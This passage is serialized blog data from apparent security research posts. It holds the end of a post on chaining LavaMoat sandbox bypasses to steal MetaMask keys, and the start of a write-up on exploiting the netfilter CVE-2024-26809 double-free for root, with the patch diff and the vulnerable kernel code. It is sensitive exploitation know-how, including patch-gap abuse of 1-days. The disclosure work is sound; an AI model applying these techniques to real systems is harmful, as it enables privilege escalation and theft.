7098,"children":57099},{"style":369},[57100],{"type":30,"value":39458},{"type":24,"tag":301,"props":57102,"children":57103},{"style":359},[57104],{"type":30,"value":206},{"type":24,"tag":301,"props":57106,"children":57107},{"style":369},[57108],{"type":30,"value":39468},{"type":24,"tag":301,"props":57110,"children":57111},{"style":359},[57112],{"type":30,"value":589},{"type":24,"tag":80,"props":57114,"children":57116},{"id":57115},"snowjs-patch",[57117],{"type":30,"value":57118},"SnowJS Patch",{"type":24,"tag":32,"props":57120,"children":57121},{},[57122,57124,57131,57133,57140],{"type":30,"value":57123},"Metamask is working on conceptual changes and aiming to integrate SnowJS as a ",{"type":24,"tag":188,"props":57125,"children":57128},{"href":57126,"rel":57127},"https://www.w3.org/2023/03/secure-the-web-forward/talks/realms.html#talk",[192],[57129],{"type":30,"value":57130},"browser feature within W3C standards",{"type":30,"value":57132},", with the intention of addressing not only this issue, but also all other well-known issues with SnowJS. ",{"type":24,"tag":188,"props":57134,"children":57137},{"href":57135,"rel":57136},"https://github.com/weizman/Realms-Initialization-Control",[192],[57138],{"type":30,"value":57139},"Here",{"type":30,"value":57141}," is their new proposal.",{"type":24,"tag":43,"props":57143,"children":57145},{"id":57144},"chaining-the-impacts",[57146],{"type":30,"value":57147},"Chaining The Impacts",{"type":24,"tag":32,"props":57149,"children":57150},{},[57151],{"type":30,"value":57152},"We were able to find two vulnerabilities in lavamoat project:",{"type":24,"tag":6246,"props":57154,"children":57155},{},[57156,57161],{"type":24,"tag":2659,"props":57157,"children":57158},{},[57159],{"type":30,"value":57160},"Policy File Bypass",{"type":24,"tag":2659,"props":57162,"children":57163},{},[57164],{"type":30,"value":57165},"Scuttling Bypass",{"type":24,"tag":32,"props":57167,"children":57168},{},[57169],{"type":30,"value":57170},"By combining the exploits, it is possible to completely bypass lavamoat supply-chain protections using a compromised dependency.",{"type":24,"tag":32,"props":57172,"children":57173},{},[57174],{"type":30,"value":57175},"Using Metamask as an example, these exploits could be used to retrieve the encrypted keypair in extension storage. The only precondition would be compromising a NPM dependency.",{"type":24,"tag":43,"props":57177,"children":57178},{"id":9652},[57179],{"type":30,"value":9655},{"type":24,"tag":32,"props":57181,"children":57182},{},[57183],{"type":30,"value":57184},"The vulnerability within the Lavapack module sandboxing, along with the issues we discussed regarding SnowJs and the Scuttling feature, illustrate the complexities of mitigating supply chain attacks within the JavaScript ecosystem. While the lavapack release with a mitigation was available in under two days, the inherent complexity makes designing robust security implementations a challenging task.",{"type":24,"tag":38102,"props":57186,"children":57187},{"style":38104},[57188],{"type":24,"tag":177,"props":57189,"children":57192},{"src":57190,"alt":57191,"style":38110},"/posts/supply-chain-attacks-a-new-era/hello-otter.gif","Hello Otetr",[],{"type":24,"tag":25200,"props":57194,"children":57196},{"className":57195,"dataFootnotes":7},[25203],[57197,57202],{"type":24,"tag":43,"props":57198,"children":57200},{"className":57199,"id":22269},[25208],[57201],{"type":30,"value":25211},{"type":24,"tag":6246,"props":57203,"children":57204},{},[57205],{"type":24,"tag":2659,"props":57206,"children":57207},{"id":37122},[57208,57210,57217,57218],{"type":30,"value":57209},"Excluding SES, which was covered ",{"type":24,"tag":188,"props":57211,"children":57214},{"href":57212,"rel":57213},"https://osec.io/blog/2023-11-01-metamask-snaps",[192],[57215],{"type":30,"value":57216},"in our last article",{"type":30,"value":13277},{"type":24,"tag":188,"props":57219,"children":57221},{"href":37150,"ariaLabel":25313,"className":57220,"dataFootnoteBackref":7},[25315],[57222],{"type":30,"value":25318},{"type":24,"tag":9672,"props":57224,"children":57225},{},[57226],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":57228},[57229,57233,57239,57245,57246,57247],{"id":25732,"depth":320,"text":25735,"children":57230},[57231,57232],{"id":35771,"depth":335,"text":35774},{"id":53857,"depth":335,"text":53860},{"id":54612,"depth":320,"text":54615,"children":57234},[57235,57236,57237,57238],{"id":54863,"depth":335,"text":54866},{"id":55336,"depth":335,"text":55339},{"id":55990,"depth":335,"text":55993},{"id":56113,"depth":335,"text":56116},{"id":56231,"depth":320,"text":56234,"children":57240},[57241,57242,57243,57244],{"id":56358,"depth":335,"text":56361},{"id":56720,"depth":335,"text":56723},{"id":56880,"depth":335,"text":56883},{"id":57115,"depth":335,"text":57118},{"id":57144,"depth":320,"text":57147},{"id":9652,"depth":320,"text":9655},{"id":22269,"depth":320,"text":25211},"content:blog:2024-06-10-supply-chain-attacks-a-new-era.md","blog/2024-06-10-supply-chain-attacks-a-new-era.md","blog/2024-06-10-supply-chain-attacks-a-new-era",{"_path":57252,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":57253,"description":57254,"author":57255,"image":57256,"date":57258,"isFeatured":16,"tags":57259,"onBlogPage":16,"body":57262,"_type":9700,"_id":67623,"_source":9702,"_file":67624,"_stem":67625,"_extension":9705},"/blog/2024-11-25-netfilter-universal-root-1-day","OtterRoot: Netfilter Universal Root 1-day","A peek into the state of Linux kernel security and the open-source patch-gap. We explore how we monitored commits to find new bug fixes and achieved 0day-like capabilities by exploiting a 1-day vulnerability.","pedro",{"src":57257,"height":16072,"width":12544},"/posts/netfilter-universal-root-1-day/cover.png","2024-11-25",[57260,57261],"kernal","linux",{"type":21,"children":57263,"toc":67591},[57264,57277,57291,57296,57302,57311,57316,57322,57327,57345,57359,57368,57401,57406,57412,57431,57464,57470,57483,57693,57760,58319,58338,58563,58622,58628,58648,58688,58876,58881,59032,59088,59093,59606,59625,59894,59920,60429,60496,60502,60538,60543,60809,60842,60854,60881,60893,60898,60904,60925,60931,60952,60975,61805,61811,61851,62390,62401,62435,62502,62555,62786,62792,62836,63300,63306,63317,63347,63430,63435,63440,63476,63526,63557,64112,64118,64135,64141,64146,64152,64180,64373,64393,64409,65001,65007,65042,65065,65077,65083,65111,65708,65733,66701,66712,66725,66738,67502,67516,67522,67534,67540,67568,67573,67577,67582,67587],{"type":24,"tag":32,"props":57265,"children":57266},{},[57267,57269,57276],{"type":30,"value":57268},"In late March, I attempted to monitor commits in Linux kernel subsystems that are hotspots for exploitable bugs, partially as an experiment to study how feasible it is to maintain LPE/container escape capabilities by patch-gapping/cycling 1-days, but also to submit to the ",{"type":24,"tag":188,"props":57270,"children":57273},{"href":57271,"rel":57272},"https://google.github.io/security-research/kernelctf/rules.html",[192],[57274],{"type":30,"value":57275},"KernelCTF VRP",{"type":30,"value":206},{"type":24,"tag":32,"props":57278,"children":57279},{},[57280,57282,57289],{"type":30,"value":57281},"During the research, I quickly came across an exploitable bug fixed in netfilter, which was labeled CVE-2024-26809 (originally discovered by ",{"type":24,"tag":188,"props":57283,"children":57286},{"href":57284,"rel":57285},"https://github.com/conlonialC",[192],[57287],{"type":30,"value":57288},"lonial con",{"type":30,"value":57290},") and was able to exploit it in the KernelCTF LTS instance and write a universal exploit that runs across different kernel builds without the need to recompile with different symbols or ROP gadgets.",{"type":24,"tag":32,"props":57292,"children":57293},{},[57294],{"type":30,"value":57295},"In this post, I'll discuss how I exploited a 1day to obtain 0day-like LPE/container escape capabilities for around two months by quickly abusing the patch-gap to write an exploit before the fix could go downstream. I'll also share my journey analyzing the patch to understand the bug, isolate the commit(s) that introduced it, exploit it in the KernelCTF VRP, and, finally, how I developed a universal exploit to target mainstream distros.",{"type":24,"tag":43,"props":57297,"children":57299},{"id":57298},"the-kernel",[57300],{"type":30,"value":57301},"The kernel",{"type":24,"tag":32,"props":57303,"children":57304},{},[57305,57307],{"type":30,"value":57306},"The kernel lies at the very core of an OS; its purpose is not to be a regular application but to create a platform that applications can run on top of. The kernel touches hardware directly to implement everything you can expect from your OS, such as user isolation and permissions, networking, filesystem access, memory management, task scheduling, etc.\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀",{"type":24,"tag":177,"props":57308,"children":57310},{"alt":179,"src":57309},"/posts/netfilter-universal-root-1-day/kernal.png",[],{"type":24,"tag":32,"props":57312,"children":57313},{},[57314],{"type":30,"value":57315},"The kernel exposes an interface that user applications can use to request things they can't do directly (e.g. map some memory to my process' virtual address space, expose some file to my process, open a network socket, etc.). This is called the syscall interface, the main form of passing data from userspace to kernelspace.",{"type":24,"tag":80,"props":57317,"children":57319},{"id":57318},"kernel-exploitation",[57320],{"type":30,"value":57321},"Kernel exploitation",{"type":24,"tag":32,"props":57323,"children":57324},{},[57325],{"type":30,"value":57326},"As the kernel processes requests passed by user applications, it is subject to bugs and security vulnerabilities just as any code would, ranging from logic issues to memory corruptions that attackers can use to hijack the execution in kernel context or escalate privileges in some other way. With that in mind, we can expect the typical kernel exploit to look like this:",{"type":24,"tag":2655,"props":57328,"children":57329},{},[57330,57335,57340],{"type":24,"tag":2659,"props":57331,"children":57332},{},[57333],{"type":30,"value":57334},"Trigger some memory corruption in some kernel subsystem",{"type":24,"tag":2659,"props":57336,"children":57337},{},[57338],{"type":30,"value":57339},"Use it to acquire some stronger primitive (Control-flow, Arb R/W, etc.)",{"type":24,"tag":2659,"props":57341,"children":57342},{},[57343],{"type":30,"value":57344},"Use your current primitive to escalate your privileges (usually by changing the creds of your process or something with similar consequences)",{"type":24,"tag":32,"props":57346,"children":57347},{},[57348,57350,57357],{"type":30,"value":57349},"I strongly recommend reading Lkmidas' Intro to Kernel Exploitation ",{"type":24,"tag":188,"props":57351,"children":57354},{"href":57352,"rel":57353},"https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/",[192],[57355],{"type":30,"value":57356},"blog post",{"type":30,"value":57358}," to become more familiar with the topic.",{"type":24,"tag":43,"props":57360,"children":57362},{"id":57361},"nf_tables",[57363],{"type":24,"tag":145,"props":57364,"children":57366},{"className":57365},[],[57367],{"type":30,"value":57361},{"type":24,"tag":32,"props":57369,"children":57370},{},[57371,57376,57378,57384,57385,57391,57393,57399],{"type":24,"tag":145,"props":57372,"children":57374},{"className":57373},[],[57375],{"type":30,"value":57361},{"type":30,"value":57377}," is a component of the netfilter subsystem of the Linux kernel. It is a package filtering mechanism, and it's the current backend used by tools like iptables and Firewalld. Its internals have been thoroughly discussed by other researchers ",{"type":24,"tag":188,"props":57379,"children":57382},{"href":57380,"rel":57381},"https://pwning.tech/nftables",[192],[57383],{"type":30,"value":546},{"type":30,"value":377},{"type":24,"tag":188,"props":57386,"children":57389},{"href":57387,"rel":57388},"https://starlabs.sg/blog/2023/09-nftables-adventures-bug-hunting-and-n-day-exploitation",[192],[57390],{"type":30,"value":1503},{"type":30,"value":57392},". I recommend reading those briefly to understand the hierarchical structure of ",{"type":24,"tag":145,"props":57394,"children":57396},{"className":57395},[],[57397],{"type":30,"value":57398},"nf_table",{"type":30,"value":57400}," objects and how we can manipulate them to create configurable filtering mechanisms.",{"type":24,"tag":32,"props":57402,"children":57403},{},[57404],{"type":30,"value":57405},"For the sake of this blog post I'll omit any details that are not directly related to the vulnerability.",{"type":24,"tag":80,"props":57407,"children":57409},{"id":57408},"transactions",[57410],{"type":30,"value":57411},"Transactions",{"type":24,"tag":32,"props":57413,"children":57414},{},[57415,57417,57422,57424,57429],{"type":30,"value":57416},"A transaction is an interaction that updates ",{"type":24,"tag":145,"props":57418,"children":57420},{"className":57419},[],[57421],{"type":30,"value":57361},{"type":30,"value":57423}," objects/state. It's roughly composed of a batch of operations that modify some ",{"type":24,"tag":145,"props":57425,"children":57427},{"className":57426},[],[57428],{"type":30,"value":57361},{"type":30,"value":57430}," object (adding/removing/editing tables, sets, elements, objects, etc). They are roughly composed of 3 different passes:",{"type":24,"tag":2655,"props":57432,"children":57433},{},[57434,57444,57454],{"type":24,"tag":2659,"props":57435,"children":57436},{},[57437,57442],{"type":24,"tag":60,"props":57438,"children":57439},{},[57440],{"type":30,"value":57441},"Control plane",{"type":30,"value":57443},"\nPrepare each operation, and if some fail, abort the whole batch; otherwise, commit the entire batch.",{"type":24,"tag":2659,"props":57445,"children":57446},{},[57447,57452],{"type":24,"tag":60,"props":57448,"children":57449},{},[57450],{"type":30,"value":57451},"Commit path",{"type":30,"value":57453},"\nAfter the control plane, if all succeed, we apply the changes (effectively modify tables, sets, etc.).",{"type":24,"tag":2659,"props":57455,"children":57456},{},[57457,57462],{"type":24,"tag":60,"props":57458,"children":57459},{},[57460],{"type":30,"value":57461},"Abort path",{"type":30,"value":57463},"\nOnly triggered when some error condition is detected in the control plane; undo actions done during the control plane and skip commitment.",{"type":24,"tag":43,"props":57465,"children":57467},{"id":57466},"vulnerability-details",[57468],{"type":30,"value":57469},"Vulnerability details",{"type":24,"tag":32,"props":57471,"children":57472},{},[57473,57475,57481],{"type":30,"value":57474},"Moving on, let's check out the ",{"type":24,"tag":188,"props":57476,"children":57479},{"href":57477,"rel":57478},"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b0e256f3dd2ba6532f37c5c22e07cb07a36031ee",[192],[57480],{"type":30,"value":11051},{"type":30,"value":57482}," that fixed the bug.",{"type":24,"tag":291,"props":57484,"children":57486},{"className":47096,"code":57485,"language":47098,"meta":7,"style":7},"diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c\nindex c0ceea068936a6..df8de509024637 100644\n--- a/net/netfilter/nft_set_pipapo.c\n+++ b/net/netfilter/nft_set_pipapo.c\n@@ -2329,8 +2329,6 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n\n m = rcu_dereference_protected(priv->match, true);\n\n if (m) {\n rcu_barrier();\n \n- nft_set_pipapo_match_destroy(ctx, set, m);\n-\n for_each_possible_cpu(cpu)\n pipapo_free_scratch(m, cpu);\n free_percpu(m->scratch);\n@@ -2342,8 +2340,7 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n if (priv->clone) {\n m = priv->clone;\n \n- if (priv->dirty)\n- nft_set_pipapo_match_destroy(ctx, set, m);\n+ nft_set_pipapo_match_destroy(ctx, set, m);\n \n for_each_possible_cpu(cpu)\n pipapo_free_scratch(priv->clone, cpu);\n",[57487],{"type":24,"tag":145,"props":57488,"children":57489},{"__ignoreMap":7},[57490,57498,57506,57514,57522,57530,57537,57545,57552,57560,57568,57576,57584,57592,57600,57608,57616,57624,57632,57640,57647,57655,57663,57671,57678,57685],{"type":24,"tag":301,"props":57491,"children":57492},{"class":303,"line":304},[57493],{"type":24,"tag":301,"props":57494,"children":57495},{"style":348},[57496],{"type":30,"value":57497},"diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c\n",{"type":24,"tag":301,"props":57499,"children":57500},{"class":303,"line":320},[57501],{"type":24,"tag":301,"props":57502,"children":57503},{"style":359},[57504],{"type":30,"value":57505},"index c0ceea068936a6..df8de509024637 100644\n",{"type":24,"tag":301,"props":57507,"children":57508},{"class":303,"line":335},[57509],{"type":24,"tag":301,"props":57510,"children":57511},{"style":348},[57512],{"type":30,"value":57513},"--- a/net/netfilter/nft_set_pipapo.c\n",{"type":24,"tag":301,"props":57515,"children":57516},{"class":303,"line":344},[57517],{"type":24,"tag":301,"props":57518,"children":57519},{"style":348},[57520],{"type":30,"value":57521},"+++ b/net/netfilter/nft_set_pipapo.c\n",{"type":24,"tag":301,"props":57523,"children":57524},{"class":303,"line":401},[57525],{"type":24,"tag":301,"props":57526,"children":57527},{"style":359},[57528],{"type":30,"value":57529},"@@ -2329,8 +2329,6 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n",{"type":24,"tag":301,"props":57531,"children":57532},{"class":303,"line":415},[57533],{"type":24,"tag":301,"props":57534,"children":57535},{"emptyLinePlaceholder":16},[57536],{"type":30,"value":341},{"type":24,"tag":301,"props":57538,"children":57539},{"class":303,"line":439},[57540],{"type":24,"tag":301,"props":57541,"children":57542},{"style":359},[57543],{"type":30,"value":57544}," m = rcu_dereference_protected(priv->match, true);\n",{"type":24,"tag":301,"props":57546,"children":57547},{"class":303,"line":447},[57548],{"type":24,"tag":301,"props":57549,"children":57550},{"emptyLinePlaceholder":16},[57551],{"type":30,"value":341},{"type":24,"tag":301,"props":57553,"children":57554},{"class":303,"line":476},[57555],{"type":24,"tag":301,"props":57556,"children":57557},{"style":359},[57558],{"type":30,"value":57559}," if (m) {\n",{"type":24,"tag":301,"props":57561,"children":57562},{"class":303,"line":495},[57563],{"type":24,"tag":301,"props":57564,"children":57565},{"style":359},[57566],{"type":30,"value":57567}," rcu_barrier();\n",{"type":24,"tag":301,"props":57569,"children":57570},{"class":303,"line":504},[57571],{"type":24,"tag":301,"props":57572,"children":57573},{"style":359},[57574],{"type":30,"value":57575}," \n",{"type":24,"tag":301,"props":57577,"children":57578},{"class":303,"line":512},[57579],{"type":24,"tag":301,"props":57580,"children":57581},{"style":329},[57582],{"type":30,"value":57583},"- nft_set_pipapo_match_destroy(ctx, set, m);\n",{"type":24,"tag":301,"props":57585,"children":57586},{"class":303,"line":592},[57587],{"type":24,"tag":301,"props":57588,"children":57589},{"style":329},[57590],{"type":30,"value":57591},"-\n",{"type":24,"tag":301,"props":57593,"children":57594},{"class":303,"line":619},[57595],{"type":24,"tag":301,"props":57596,"children":57597},{"style":359},[57598],{"type":30,"value":57599}," for_each_possible_cpu(cpu)\n",{"type":24,"tag":301,"props":57601,"children":57602},{"class":303,"line":635},[57603],{"type":24,"tag":301,"props":57604,"children":57605},{"style":359},[57606],{"type":30,"value":57607}," pipapo_free_scratch(m, cpu);\n",{"type":24,"tag":301,"props":57609,"children":57610},{"class":303,"line":643},[57611],{"type":24,"tag":301,"props":57612,"children":57613},{"style":359},[57614],{"type":30,"value":57615}," free_percpu(m->scratch);\n",{"type":24,"tag":301,"props":57617,"children":57618},{"class":303,"line":652},[57619],{"type":24,"tag":301,"props":57620,"children":57621},{"style":359},[57622],{"type":30,"value":57623},"@@ -2342,8 +2340,7 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n",{"type":24,"tag":301,"props":57625,"children":57626},{"class":303,"line":666},[57627],{"type":24,"tag":301,"props":57628,"children":57629},{"style":359},[57630],{"type":30,"value":57631}," if (priv->clone) {\n",{"type":24,"tag":301,"props":57633,"children":57634},{"class":303,"line":674},[57635],{"type":24,"tag":301,"props":57636,"children":57637},{"style":359},[57638],{"type":30,"value":57639}," m = priv->clone;\n",{"type":24,"tag":301,"props":57641,"children":57642},{"class":303,"line":692},[57643],{"type":24,"tag":301,"props":57644,"children":57645},{"style":359},[57646],{"type":30,"value":57575},{"type":24,"tag":301,"props":57648,"children":57649},{"class":303,"line":3631},[57650],{"type":24,"tag":301,"props":57651,"children":57652},{"style":329},[57653],{"type":30,"value":57654},"- if (priv->dirty)\n",{"type":24,"tag":301,"props":57656,"children":57657},{"class":303,"line":3639},[57658],{"type":24,"tag":301,"props":57659,"children":57660},{"style":329},[57661],{"type":30,"value":57662},"- nft_set_pipapo_match_destroy(ctx, set, m);\n",{"type":24,"tag":301,"props":57664,"children":57665},{"class":303,"line":3647},[57666],{"type":24,"tag":301,"props":57667,"children":57668},{"style":466},[57669],{"type":30,"value":57670},"+ nft_set_pipapo_match_destroy(ctx, set, m);\n",{"type":24,"tag":301,"props":57672,"children":57673},{"class":303,"line":3685},[57674],{"type":24,"tag":301,"props":57675,"children":57676},{"style":359},[57677],{"type":30,"value":57575},{"type":24,"tag":301,"props":57679,"children":57680},{"class":303,"line":3713},[57681],{"type":24,"tag":301,"props":57682,"children":57683},{"style":359},[57684],{"type":30,"value":57599},{"type":24,"tag":301,"props":57686,"children":57687},{"class":303,"line":3721},[57688],{"type":24,"tag":301,"props":57689,"children":57690},{"style":359},[57691],{"type":30,"value":57692}," pipapo_free_scratch(priv->clone, cpu);\n",{"type":24,"tag":32,"props":57694,"children":57695},{},[57696,57698,57704,57705,57711,57713,57719,57721,57727,57729,57734,57736,57742,57744,57750,57752,57758],{"type":30,"value":57697},"If the ",{"type":24,"tag":145,"props":57699,"children":57701},{"className":57700},[],[57702],{"type":30,"value":57703},"priv->dirty",{"type":30,"value":2378},{"type":24,"tag":145,"props":57706,"children":57708},{"className":57707},[],[57709],{"type":30,"value":57710},"priv->clone",{"type":30,"value":57712}," variables are set, ",{"type":24,"tag":145,"props":57714,"children":57716},{"className":57715},[],[57717],{"type":30,"value":57718},"nft_set_pipapo_match_destroy()",{"type":30,"value":57720}," is called twice, once with ",{"type":24,"tag":145,"props":57722,"children":57724},{"className":57723},[],[57725],{"type":30,"value":57726},"priv->match",{"type":30,"value":57728}," as an argument, and then again with ",{"type":24,"tag":145,"props":57730,"children":57732},{"className":57731},[],[57733],{"type":30,"value":57710},{"type":30,"value":57735},". Looking at what this function does, we can see that it is iterating over the ",{"type":24,"tag":145,"props":57737,"children":57739},{"className":57738},[],[57740],{"type":30,"value":57741},"setelem",{"type":30,"value":57743},"s of the ",{"type":24,"tag":145,"props":57745,"children":57747},{"className":57746},[],[57748],{"type":30,"value":57749},"set",{"type":30,"value":57751}," and calling ",{"type":24,"tag":145,"props":57753,"children":57755},{"className":57754},[],[57756],{"type":30,"value":57757},"nf_tables_set_elem_destroy()",{"type":30,"value":57759}," for each of them.",{"type":24,"tag":291,"props":57761,"children":57763},{"className":295,"code":57762,"language":294,"meta":7,"style":7},"static void nft_set_pipapo_match_destroy(const struct nft_ctx *ctx,\n const struct nft_set *set,\n struct nft_pipapo_match *m)\n{\n struct nft_pipapo_field *f;\n int i, r;\n\n for (i = 0, f = m->f; i \u003C m->field_count - 1; i++, f++)\n ;\n\n for (r = 0; r \u003C f->rules; r++) {\n struct nft_pipapo_elem *e;\n\n if (r \u003C f->rules - 1 && f->mt[r + 1].e == f->mt[r].e)\n continue;\n\n e = f->mt[r].e;\n\n nf_tables_set_elem_destroy(ctx, set, &e->priv);\n }\n}\n",[57764],{"type":24,"tag":145,"props":57765,"children":57766},{"__ignoreMap":7},[57767,57812,57840,57866,57873,57894,57907,57914,58008,58016,58023,58078,58099,58106,58209,58221,58228,58264,58271,58305,58312],{"type":24,"tag":301,"props":57768,"children":57769},{"class":303,"line":304},[57770,57774,57778,57783,57787,57791,57795,57800,57804,57808],{"type":24,"tag":301,"props":57771,"children":57772},{"style":348},[57773],{"type":30,"value":752},{"type":24,"tag":301,"props":57775,"children":57776},{"style":348},[57777],{"type":30,"value":757},{"type":24,"tag":301,"props":57779,"children":57780},{"style":314},[57781],{"type":30,"value":57782}," nft_set_pipapo_match_destroy",{"type":24,"tag":301,"props":57784,"children":57785},{"style":359},[57786],{"type":30,"value":362},{"type":24,"tag":301,"props":57788,"children":57789},{"style":348},[57790],{"type":30,"value":16460},{"type":24,"tag":301,"props":57792,"children":57793},{"style":348},[57794],{"type":30,"value":27920},{"type":24,"tag":301,"props":57796,"children":57797},{"style":359},[57798],{"type":30,"value":57799}," nft_ctx ",{"type":24,"tag":301,"props":57801,"children":57802},{"style":385},[57803],{"type":30,"value":772},{"type":24,"tag":301,"props":57805,"children":57806},{"style":369},[57807],{"type":30,"value":27051},{"type":24,"tag":301,"props":57809,"children":57810},{"style":359},[57811],{"type":30,"value":1729},{"type":24,"tag":301,"props":57813,"children":57814},{"class":303,"line":320},[57815,57819,57823,57828,57832,57836],{"type":24,"tag":301,"props":57816,"children":57817},{"style":348},[57818],{"type":30,"value":38300},{"type":24,"tag":301,"props":57820,"children":57821},{"style":348},[57822],{"type":30,"value":27920},{"type":24,"tag":301,"props":57824,"children":57825},{"style":359},[57826],{"type":30,"value":57827}," nft_set ",{"type":24,"tag":301,"props":57829,"children":57830},{"style":385},[57831],{"type":30,"value":772},{"type":24,"tag":301,"props":57833,"children":57834},{"style":369},[57835],{"type":30,"value":57749},{"type":24,"tag":301,"props":57837,"children":57838},{"style":359},[57839],{"type":30,"value":1729},{"type":24,"tag":301,"props":57841,"children":57842},{"class":303,"line":335},[57843,57848,57853,57857,57862],{"type":24,"tag":301,"props":57844,"children":57845},{"style":348},[57846],{"type":30,"value":57847}," struct",{"type":24,"tag":301,"props":57849,"children":57850},{"style":359},[57851],{"type":30,"value":57852}," nft_pipapo_match ",{"type":24,"tag":301,"props":57854,"children":57855},{"style":385},[57856],{"type":30,"value":772},{"type":24,"tag":301,"props":57858,"children":57859},{"style":369},[57860],{"type":30,"value":57861},"m",{"type":24,"tag":301,"props":57863,"children":57864},{"style":359},[57865],{"type":30,"value":791},{"type":24,"tag":301,"props":57867,"children":57868},{"class":303,"line":344},[57869],{"type":24,"tag":301,"props":57870,"children":57871},{"style":359},[57872],{"type":30,"value":799},{"type":24,"tag":301,"props":57874,"children":57875},{"class":303,"line":401},[57876,57880,57885,57889],{"type":24,"tag":301,"props":57877,"children":57878},{"style":348},[57879],{"type":30,"value":27920},{"type":24,"tag":301,"props":57881,"children":57882},{"style":359},[57883],{"type":30,"value":57884}," nft_pipapo_field ",{"type":24,"tag":301,"props":57886,"children":57887},{"style":385},[57888],{"type":30,"value":772},{"type":24,"tag":301,"props":57890,"children":57891},{"style":359},[57892],{"type":30,"value":57893},"f;\n",{"type":24,"tag":301,"props":57895,"children":57896},{"class":303,"line":415},[57897,57902],{"type":24,"tag":301,"props":57898,"children":57899},{"style":348},[57900],{"type":30,"value":57901}," int",{"type":24,"tag":301,"props":57903,"children":57904},{"style":359},[57905],{"type":30,"value":57906}," i, r;\n",{"type":24,"tag":301,"props":57908,"children":57909},{"class":303,"line":439},[57910],{"type":24,"tag":301,"props":57911,"children":57912},{"emptyLinePlaceholder":16},[57913],{"type":30,"value":341},{"type":24,"tag":301,"props":57915,"children":57916},{"class":303,"line":447},[57917,57922,57927,57931,57935,57940,57944,57949,57953,57957,57961,57965,57969,57973,57978,57982,57986,57991,57995,58000,58004],{"type":24,"tag":301,"props":57918,"children":57919},{"style":308},[57920],{"type":30,"value":57921}," for",{"type":24,"tag":301,"props":57923,"children":57924},{"style":359},[57925],{"type":30,"value":57926}," (i ",{"type":24,"tag":301,"props":57928,"children":57929},{"style":385},[57930],{"type":30,"value":523},{"type":24,"tag":301,"props":57932,"children":57933},{"style":466},[57934],{"type":30,"value":685},{"type":24,"tag":301,"props":57936,"children":57937},{"style":359},[57938],{"type":30,"value":57939},", f ",{"type":24,"tag":301,"props":57941,"children":57942},{"style":385},[57943],{"type":30,"value":523},{"type":24,"tag":301,"props":57945,"children":57946},{"style":369},[57947],{"type":30,"value":57948}," m",{"type":24,"tag":301,"props":57950,"children":57951},{"style":359},[57952],{"type":30,"value":882},{"type":24,"tag":301,"props":57954,"children":57955},{"style":369},[57956],{"type":30,"value":39835},{"type":24,"tag":301,"props":57958,"children":57959},{"style":359},[57960],{"type":30,"value":1844},{"type":24,"tag":301,"props":57962,"children":57963},{"style":385},[57964],{"type":30,"value":1849},{"type":24,"tag":301,"props":57966,"children":57967},{"style":369},[57968],{"type":30,"value":57948},{"type":24,"tag":301,"props":57970,"children":57971},{"style":359},[57972],{"type":30,"value":882},{"type":24,"tag":301,"props":57974,"children":57975},{"style":369},[57976],{"type":30,"value":57977},"field_count",{"type":24,"tag":301,"props":57979,"children":57980},{"style":385},[57981],{"type":30,"value":3407},{"type":24,"tag":301,"props":57983,"children":57984},{"style":466},[57985],{"type":30,"value":487},{"type":24,"tag":301,"props":57987,"children":57988},{"style":359},[57989],{"type":30,"value":57990},"; i",{"type":24,"tag":301,"props":57992,"children":57993},{"style":385},[57994],{"type":30,"value":1859},{"type":24,"tag":301,"props":57996,"children":57997},{"style":359},[57998],{"type":30,"value":57999},", f",{"type":24,"tag":301,"props":58001,"children":58002},{"style":385},[58003],{"type":30,"value":1859},{"type":24,"tag":301,"props":58005,"children":58006},{"style":359},[58007],{"type":30,"value":791},{"type":24,"tag":301,"props":58009,"children":58010},{"class":303,"line":476},[58011],{"type":24,"tag":301,"props":58012,"children":58013},{"style":359},[58014],{"type":30,"value":58015}," ;\n",{"type":24,"tag":301,"props":58017,"children":58018},{"class":303,"line":495},[58019],{"type":24,"tag":301,"props":58020,"children":58021},{"emptyLinePlaceholder":16},[58022],{"type":30,"value":341},{"type":24,"tag":301,"props":58024,"children":58025},{"class":303,"line":504},[58026,58030,58035,58039,58043,58048,58052,58056,58060,58065,58070,58074],{"type":24,"tag":301,"props":58027,"children":58028},{"style":308},[58029],{"type":30,"value":57921},{"type":24,"tag":301,"props":58031,"children":58032},{"style":359},[58033],{"type":30,"value":58034}," (r ",{"type":24,"tag":301,"props":58036,"children":58037},{"style":385},[58038],{"type":30,"value":523},{"type":24,"tag":301,"props":58040,"children":58041},{"style":466},[58042],{"type":30,"value":685},{"type":24,"tag":301,"props":58044,"children":58045},{"style":359},[58046],{"type":30,"value":58047},"; r ",{"type":24,"tag":301,"props":58049,"children":58050},{"style":385},[58051],{"type":30,"value":1849},{"type":24,"tag":301,"props":58053,"children":58054},{"style":369},[58055],{"type":30,"value":39721},{"type":24,"tag":301,"props":58057,"children":58058},{"style":359},[58059],{"type":30,"value":882},{"type":24,"tag":301,"props":58061,"children":58062},{"style":369},[58063],{"type":30,"value":58064},"rules",{"type":24,"tag":301,"props":58066,"children":58067},{"style":359},[58068],{"type":30,"value":58069},"; r",{"type":24,"tag":301,"props":58071,"children":58072},{"style":385},[58073],{"type":30,"value":1859},{"type":24,"tag":301,"props":58075,"children":58076},{"style":359},[58077],{"type":30,"value":398},{"type":24,"tag":301,"props":58079,"children":58080},{"class":303,"line":512},[58081,58085,58090,58094],{"type":24,"tag":301,"props":58082,"children":58083},{"style":348},[58084],{"type":30,"value":12617},{"type":24,"tag":301,"props":58086,"children":58087},{"style":359},[58088],{"type":30,"value":58089}," nft_pipapo_elem 